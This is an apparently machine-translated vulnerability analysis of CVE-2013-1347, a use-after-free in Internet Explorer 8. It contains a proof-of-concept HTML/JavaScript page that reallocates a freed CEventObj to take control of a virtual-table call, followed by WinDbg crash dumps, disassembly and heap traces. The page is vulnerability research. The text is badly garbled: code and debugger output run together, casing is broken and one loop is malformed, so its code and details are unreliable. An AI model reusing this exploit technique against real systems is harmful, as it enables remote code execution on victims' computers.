[CNNVD] Microsoft Internet Explorer 8 Remote Code Execution vulnerability (cnnvd-201305-092)
Microsoft Internet Explorer is the default bundled Web browser in a Windows operating system that is published by Microsoft Corporation (Microsoft) in the United States.
A remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been properly initialized or has been deleted, which could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker could have a specially crafted Web site designed to exploit this vulnerability through IE and then persuade a user to view the site.
Poc:
<!doctype html>functionHelloWorld () {animvalues= ""; //mshtml! CElement::D OC: //6586c815 8B01 mov eax,dword ptr [ecx] //6586c817 8b5070 mov edx,dword ptr [eax+70h] //6586c81a ffd2 call edx for(i=0; I <= 0X70/4; i++) {//T:animatecolor Label the first object to overwrite the virtual table pointer //since the index virtual function requires an offset 0x70, the 0X70/4 is used to precisely control the edx value . if(i = = 0X70/4) {//animvalues + = unescape ("%u5ed5%u77c1"); Animvalues + = unescape ("%u4141%u4141");//Control edx=0x41414141 } Else{animvalues+ = unescape ("%u4242%u4242");//0x42424242 } } for(i = 0; i < i++;) { //T:animatecolor Tag Value is a semicolon-delimited string, the number of semicolons determines the size of the object, //each element of the object is a pointer to a semicolon-delimited string //The vulnerability object cgnericelement size 0x4c, so you need a string with 0x4c/4=13 semicolons hereAnimvalues + = "; Red"; } F0= Document.createelement (' span '); Document.body.appendChild (F0); F1= Document.createelement (' span '); Document.body.appendChild (F1); F2= Document.createelement (' span '); Document.body.appendChild (F2); Document.body.contentEditable= "true"; F2.appendchild (Document.createelement (' DataList ')); F1.appendchild (Document.createelement (' Span ')); F1.appendchild (Document.createelement (' Table ')); Try{f0.offsetparent=NULL; }Catch(e) {} f2.innerhtml=""; F0.appendchild (Document.createelement (' HR ')); F1.innerhtml=""; CollectGarbage (); Try { //use T:animatecolor tags to freely set their contents, control object SizeA = document.getElementById (' Myanim '); A.values=animvalues; } Catch(e) {}}</script>The crash caused by opening the POC is as follows, and the page heap and heap allocation records are turned on.
(4dc.8f0): Access violation-code c0000005 (first chance) first chance exceptions is reported before any exception ha Ndling. This exception is expected andhandled.eax=66c25100 ebx=17a72fb0 ecx=09106fc8edx=00000000Esi=045fedc8Edi=00000000eip=668ac400 esp=045fed9cebp=045FEDB4Iopl=0nv up ei pl zr na pe nccs=001bss=0023ds=0023es=0023fs=003bgs=0000Efl=00010246mshtml!CElement::Doc:668ac400 8b01movEax,dword ptr [ecx]ds:0023:09106fc8=????????
Take a look at the nearby assembly, as shown below. is very obvious object access, see the first three sentences to know is to go to the object virtual table, and then the index virtual function to call. Crash appears in ECX
1:017> U 668ac400mshtml!CElement::Doc:668ac400 8b01movEax,dword ptr [ecx]668ac402 8b5070movEdx,dword ptr [eax+70h]668ac405 ffd2Pageredx668ac407 8b400cmovEax,dword ptr [eax+0ch]668ac40a c3ret668ac40b 33c0XOReax,eax668ac40d e9f7aeffffjmpmshtml!Cattrarray::P rivatefind+0x8f (668a7309) 668ac412 - NOP
We look at the ECX, as shown below, ECX is not available. So I just need to focus on what ECX is and what it's all about.
1:017> DC ecx09106fc8 ???????? ???????? ???????? ???????? ????????????????09106fd8 ???????? ???????? ???????? ???????? ????????????????09106fe8 ???????? ???????? ???????? ???????? ????????????????09106ff8 ???????? ???????? ???????? ???????? ????????????????09107008 ???????? ???????? ???????? ???????? ????????????????09107018 ???????? ???????? ???????? ???????? ????????????????09107028 ???????? ???????? ???????? ???????? ????????????????09107038???????? ???????? ???????? ???????? ????????????????
See if the ecx is a heap, as shown below, and sure enough it belongs to the heap, and according to the heap allocation backtracking This is the heap that has been freed, the obvious UAF loophole. We specifically look at what this object,ceventobj:: ' vector deleting destructor' seems to be a problem with the ceventobj object
1:017>!heap-p-a ECX address09106fc8Foundinch_dph_heap_root @51000 inchFree-ed Allocation (Dph_heap_block:virtaddr virtsize) 7093c98:9106000 -737e90b2 verifier! AVRFDEBUGPAGEHEAPFREE+0X000000C277955674ntdll! rtldebugfreeheap+0x0000002f 77917aca ntdll! rtlpfreeheap+0x0000005d 778e2d68 ntdll! rtlfreeheap+0x00000142 76fff1ac kernel32! heapfree+0x00000014 668B7DFC mshtml!Ceventobj:: ' Vector deleting destructor'+0x00000022 668b7dd0 mshtml! cbase::subrelease+0x00000022 668ab034 mshtml! plainrelease+0x00000025 69e398ea mstime! CEVENTMGR::_FIREEVENT+0X000001C0 69dfd9db mstime! CTIMEELEMENTBASE::FIREEVENTS+0X000000CE 69dfb7c9 mstime! ctimeelementbase::fireevent+0x0000016e 69e00521 mstime! MMBASEBVR::TEBVR::EVENTNOTIFY+0X000000AC 69e49379 mstime! Eventdispatcher::D oit+0x0000001c 69e492bb mstime! dispatch+0x00000083 69e493b7 mstime! Cnodebvrlist::D ispatcheventnotify+0x00000035 69e46f95 mstime! ceventdata::callevent+0x00000021 69e442a6 mstime! Ctimenodemgr::tick+0x000000ec 69e00b05 mstime! mmplayer::tick+0x0000004a 69e00b62 mstime! mmplayer::ontimer+0x00000036 69df720e mstime! CTIMEBODYELEMENT::STARTROOTTIME+0X000000A2 69df6ee4 mstime! ctimebodyelement::onload+0x0000002f 69dfd528 mstime! ctimeelementbase::onloadevent+0x0000001e 69e39e54 mstime! ceventmgr::invoke+0x00000230 6690be60 mshtml! cbase::invokeevent+0x00000512 668ff3f1 mshtml! comwindowproxy::fireevent+0x00000169 66896a12 mshtml! Comwindowproxy::fire_onload+0x000000d5 66896dde mshtml! cmarkup::onloadstatusdone+0x0000040a 66896AAF mshtml! cmarkup::onloadstatus+0x00000047 66896fad mshtml! Cprogsink::D oupdate+0x00000549 66824fab mshtml! cprogsink::onmethodcall+0x00000012 668c94b2 mshtml! GLOBALWNDONMETHODCALL+0X000000FF 668b37f7 mshtml! Globalwndproc+0x0000010c
To verify our guesses, let's look at how the UAF object is distributed. Let's start by breaking down the destructor for this object, as follows.
1 : 017 > x mshtml!ceventobj: : ' vector deleting Destructor ' 668b7dda mshtml! Ceventobj:: ' vector deleting destructor ' = <no type Information> 1 : 1 : 017 > bl 0 e 668b7dda 0001 (0001 ) 1 :* * * * mshtml! ceventobj: : ' scalar deleting destructor
Reload the process and don't forget to set the. childdbg 1. Each run must be reset feel good annoying, do not know how to set save.
Cve-2013-1347microsoft Internet Explorer 8 Remote Code Execution vulnerability